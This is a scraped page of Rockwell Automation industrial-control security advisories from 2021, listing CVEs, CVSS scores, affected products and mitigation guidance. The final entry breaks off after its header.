CVE-2021-31227: Malformed HTTP POST request could cause device to fault by overwriting memory

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP Post request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31228: Non-random source port could lead to a spoofed DNS response

A REMOTE, UNAUTHENTICATED attacker may be able to spoof a DNS response, which would result in the device communicating with a potentially malicious server.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N


CVE-2021-36762: TFTP packet processing function does not ensure that the filename is null-terminated

Rockwell Automation is not impacted by this vulnerability

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.
Product Vulnerability Mitigation
20-COMM-ER CVE-2021-31226
CVE-2021-31227		 Disable the webserver.
See the product’s user manual for the procedure to do this.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help confirm that DNS traffic from unauthorized sources is blocked.
  • Block traffic to port 80 (HTTP) and ICMP traffic using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1571 | PN1571 | MicroLogix 1100 Persistent CPU Fault Vulnerability
Published Date:
July 09, 2021
Last Updated:
July 09, 2021
CVE IDs:
CVE-2021-33012
Products:
1763 MicroLogix 1100
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History

Version 1.0 – July 9, 2021. Initial Release

Executive Summary

Rockwell Automation received a report from Beau Taub at Bayshore Networks regarding a vulnerability in the MicroLogix 1100. If successfully exploited, this vulnerability may limit the availability of the programmable logic controller. Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • MicroLogix 1100, all versions.

Vulnerability Details

CVE-2021-33012: Persistent fault may lead to denial of service conditions.

A vulnerability exists in the MicroLogix 1100 that may allow a remote, unauthenticated attacker to cause a persistent fault condition. This condition will prevent the PLC from entering a RUN state which cannot be fixed by resetting the device. If successfully exploited, this vulnerability will cause the controller to fault when the controller is switched to RUN mode.

CVSS v3.1 Base Score: 8.6 /10 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerability

Suggested Actions

CVE-2021-33012

Put the controller mode switch to “Run” mode. Customer’s should consider migrating to a more contemporary controller.
Customers are encouraged to have a backup copy of the project in the case it is necessary to recover from an event.

A controller in this state can be recovered by downloading a new project to the controller or an offline copy of the project.

Additionally, Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Use proper network infrastructure controls, such as firewalls, to help confirm that EtherNet/IP™ network traffic from unauthorized sources are blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1569 | PN1569 | FactoryTalk Security Remote Desktop Connection ‘Computer Name’ Policy Bypass Vulnerability
Published Date:
June 10, 2021
Last Updated:
June 10, 2021
CVE IDs:
CVE-2021-32960
Products:
FactoryTalk Services Platform
CVSS Scores:
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 10, 2021. Initial Release.

Executive Summary

Rockwell Automation discovered a vulnerability in FactoryTalk® Security, part of FactoryTalk Service Platform. This vulnerability, if successfully exploited, may allow remote, authenticated users to bypass FactoryTalk Security policies that are based on a computer name. These policies may be important to customers who are concerned about users at an engineering workstation having ‘line-of-site’ visibility to the systems they are operating.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform v6.11 and earlier, if FactoryTalk Security is enabled and deployed.

Vulnerability Details

CVE-2021-32960: FactoryTalk Security protection mechanism failure for remote desktop connections
FactoryTalk Services Platform contains a vulnerability that may allow a remote, authenticated attacker to bypass FactoryTalk Security policies based on the computer name. If successfully exploited, this may allow an attacker to have the same privileges as if they were logged on to the client machine.

CVSS v3.1 Base Score: 8.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2021-32960 Apply FactoryTalk Services Platform v6.20 or later.

If upgrade is not possible, customers should consider the following guidance:
  • When possible, do not utilize remote desktop connections.
  • Use Microsoft® Event Logger or similar event logging application to monitor atypical remote desktop connections and disconnections. Information on Setting up Windows® Event Logs is available at Knowledgebase Article QA5965.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

Medium
PN1566 | PN1566 | Micro800 and MicroLogix 1400 Vulnerable to Man-in-the-Middle Attack
Published Date:
May 25, 2021
Last Updated:
May 25, 2021
CVE IDs:
CVE-2021-32926
Products:
Micro800, 1766 MicroLogix 1400
CVSS Scores:
6.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – May 25, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Adeen Ayub from Virginia Commonwealth University, Hyunguk Yoo from The University of New Orleans, and Irfan Ahmed from Virginia Commonwealth University regarding a man-in-the-middle vulnerability in the Micro800™ and MicroLogix™ 1400. If successfully exploited, this vulnerability may result in denial-of-service conditions. To recover from this condition, a firmware flash on the controller will need to be performed. Firmware flashing will put the controller into the default state and the user program and data will be lost.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Micro800, all versions.
MicroLogix 1400, version 21 and later when Enhanced Password Security enabled.

Vulnerability Details

CVE-2021-32926: Improper authentication may lead to denial of service conditions
A vulnerability exists in how the Micro800 and MicroLogix 1400 controllers authenticate password change requests. If successfully exploited, this vulnerability may allow a remote, unauthenticated attacker to perform a man –in-the-middle attack in which the attacker intercepts the message that includes the legitimate, new password hash and replaces the legitimate password hash with an illegitimate hash. The user would no longer be able to authenticate to the controller causing a denial-of-service condition.


CVSS v3.1 Base Score: 6.1/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. Rockwell Automation has determined that this vulnerability cannot be remediated with a patch. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.
Vulnerability Suggested Actions
CVE-2021-32926 Confirm that setting and updating the password for the controller is done within a trusted network environment that is only accessible to authorized users.

If this vulnerability is successfully exploited, the password can be reset by performing a firmware flash on the controller.  The password can be reset by performing a firmware flash on the controller. Firmware flashing will put the controller into the default state and the user program and data will be lost.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage the vulnerability, an unauthorized user would require access to the same network as the controller. Customers should confirm they are employing proper networking segmentation and security controls.

Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to confirm that CIP™ traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 44818 and Port# 2222  using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

High
PN1565 | PN1565 | Connected Components Workbench Vulnerable to Multiple Phishing-Style Attacks
Published Date:
May 13, 2021
Last Updated:
May 13, 2021
CVE IDs:
CVE-2021-27473, CVE-2021-27471, CVE-2021-27475
Products:
Connected Components Workbench
CVSS Scores:
6.1, 7.7, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 13, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Mashav Sapir of Claroty regarding three vulnerabilities in Connected Components Workbench™. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Connected Components Workbench v12.00.00 and below.

Vulnerability Details

CVE-2021-27475: Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects, which can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27471: Directory traversal vulnerability may lead to privilege escalation
The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that when opened by Connected Components Workbench can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions of the Connected Components Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27473: Improper input sanitization may lead to privilege escalation
Connected Components Workbench does not to sanitize paths specified within the .ccwarc archive file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .ccwarc archive file that when opened by Connected Components Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2021-27475
CVE-2021-27471
CVE-2021-27471		 Upgrade to Connected Components Workbench v13.00.00 or later. (Link)

If upgrade is not possible, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .ccwarc, files with Connected Components Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or another similar allow list application that can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

Critical
PN1564 | PN1564 | DNS Name:Wreck Vulnerabilities Affect Multiple Rockwell Automation Products
Published Date:
April 28, 2021
Last Updated:
April 28, 2021
CVE IDs:
CVE-2016-20009
Products:
5069 CompactLogix, Communications Modules, 1769 CompactLogix Controllers, 1756 ControlLogix
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - April 26, 2021. Initial release.
Revision History
Revision Number
1.1
Revision History
Version 1.1 - April 28, 2021. Updated affected products and suggested user actions.

Executive Summary

On April 12, 2021 Forescout and JSOF released a report titled "NAME:WRECK" regarding nine DNS-related vulnerabilities against 4 TCP/IP stacks utilized by many different technology vendors, including Rockwell Automation™. Rockwell Automation is impacted by one of these nine reported vulnerabilities. This vulnerability, if successfully exploited, may result in remote code execution.

Rockwell Automation continues to investigate impact of these vulnerabilities and will update this advisory if additional products are impacted. We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview  within the Knoweldgebase.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerablity and recommended countermeasures, are provided herein.

Affected Products

Product Family Catalogs Affected Versions
Compact 5000™ I/O EtherNet/IP Adapter 5069-AEN2TR All versions.
CompactLogix 5370 1769-L1y
1769-L2y
1769-L3y		 All versions prior to v30.
1769-L3yS All versions prior to v30, excluding v28.015
ControlLogix® 5580 1756-L8 All versions prior to v30.
CompactLogix 5380 5069-L3 All versions prior to v30.
ControlLogix EtherNet/IP Module 1756-EN2T/D
1756-EN2TK/D
1756-EN2TXT/D
1756-EN2F/C
1756-EN2FK/C
1756-EN2TR/C
1756-EN2TRK/C
1756-EN2TRXT/C
1756-EN3TR/B
1756-EN3TRK/B
1756-EN2TPK/A
1756-EN2TPXT/A 		All versions prior to v11.001.
1756-EN2TP/A All versions prior to v10.020.

Note: GuardLogix® 5580 and Compact GuardLogix® 5380 are not affected by this vulnerability.

Vulnerability Details

CVE-2016-20009: Stack-based overflow in the IPnet may lead to remote code execution
In Wind River VxWorks versions 6.5 through 7, the DNS client (IPnet) has a stack-based overflow on the message decompression function. This may allow a remote, unauthenticated attacker to perform remote code execution.

CVSS v3.1 Base Score: 9.8/10[CRITICAL]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product Family Catalogs Suggested Actions
Compact 5000™ I/O EtherNet/IP Adapter 5069-AEN2TR Will not be patched. Suggested action is to migrate to the 5069-AENTR.
CompactLogix 5370 1769-L1y
1769-L2y
1769-L3y		 Apply v30 or later.
1769-L3yS Apply v28.015 or v30 or later
ControlLogix® 5580 1756-L8 Apply v30 or later.
CompactLogix 5380 5069-L3
Apply v30 or later.
ControlLogix EtherNet/IP Module 1756-EN2T/D
1756-EN2TK/D
1756-EN2TXT/D
1756-EN2F/C
1756-EN2FK/C
1756-EN2TR/C
1756-EN2TRK/C
1756-EN2TRXT/C
1756-EN3TR/B
1756-EN3TRK/B
1756-EN2TPK/A
1756-EN2TPXT/A 		Apply v11.001 or later.
1756-EN2TP/A Apply v10.020 or later.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources are blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting which may be used to block unauthorized changes, etc.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical
PN1559 | PN1559 | FactoryTalk AssetCentre Vulnerable to Arbitrary Code Execution
Published Date:
April 01, 2021
Last Updated:
April 01, 2021
CVE IDs:
CVE-2021-27466, CVE-2021-27460, CVE-2021-27474, CVE-2021-27468, CVE-2021-27470, CVE-2021-27462, CVE-2021-27464, CVE-2021-27476, CVE-2021-27472
Products:
FactoryTalk AssetCentre
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – April 1, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding nine vulnerabilities in FactoryTalk® AssetCentre software. These vulnerabilities, if successfully exploited, may allow unauthenticated attackers to perform arbitrary command execution, SQL injection, or remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre, v10.00 and earlier.

Vulnerability Details

CVE-2021-27462: Deserialization of untrusted data in AosService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the AosService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27466: Deserialization of untrusted data in ArchiveService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the ArchiveService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27470: Deserialization of untrusted data in LogService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the LogService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27474: Improperly restricted functions may result in loss of data integrity
FactoryTalk AssetCentre does not properly restrict all functions relating to IIS remoting services. This vulnerability may allow a remote, unauthenticated attacker to modify sensitive data in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27476: RACompareService service vulnerable to OS command injection
A vulnerability exists in the SaveConfigFile function of the RACompareService service that may allow for OS Command Injection. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27472: SearchService service vulnerable to SQL injection
A vulnerability exists in the RunSearch function of SearchService service, which may allow for the execution of remote unauthenticated arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27468: AosService.rem vulnerable to SQL injection
The AosService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27464: ArchiveService.rem vulnerable to SQL injection
The ArchiveService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27460: Server deserialization of untrusted data in .NET remoting endpoints may lead to remote code execution
FactoryTalk AssetCentre components contain .NET remoting endpoints that deserialize untrusted data without sufficiently verifying that the resulting data will be valid. This vulnerability may allow a remote, unauthenticated attacker to gain full access to the FactoryTalk AssetCentre main server and all agent machines.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability Suggested Actions
CVE-2021-27462
CVE-2021-27466
CVE-2021-27470
CVE-2021-27474
CVE-2021-27476
CVE-2021-27472
CVE-2021-27468
CVE-2021-27464
CVE-2021-27460		 Apply FactoryTalk AssetCentre v11 or above (Download).

As an additional mitigation, customers who are unable to upgrade or are concerned about unauthorized client connections are encouraged to deploy IPsec, a built in security feature found within FactoryTalk AssetCentre. Users should follow guidance found in QA46277. IPsec would minimize exposure to unauthorized clients and has been tested in FactoryTalk AssetCentre v9 – v11.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
 General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Medium
PN1588 | PN1588 | File Parsing XML Entity in Multiple Products
Published Date:
March 28, 2021
Last Updated:
March 28, 2021
CVE IDs:
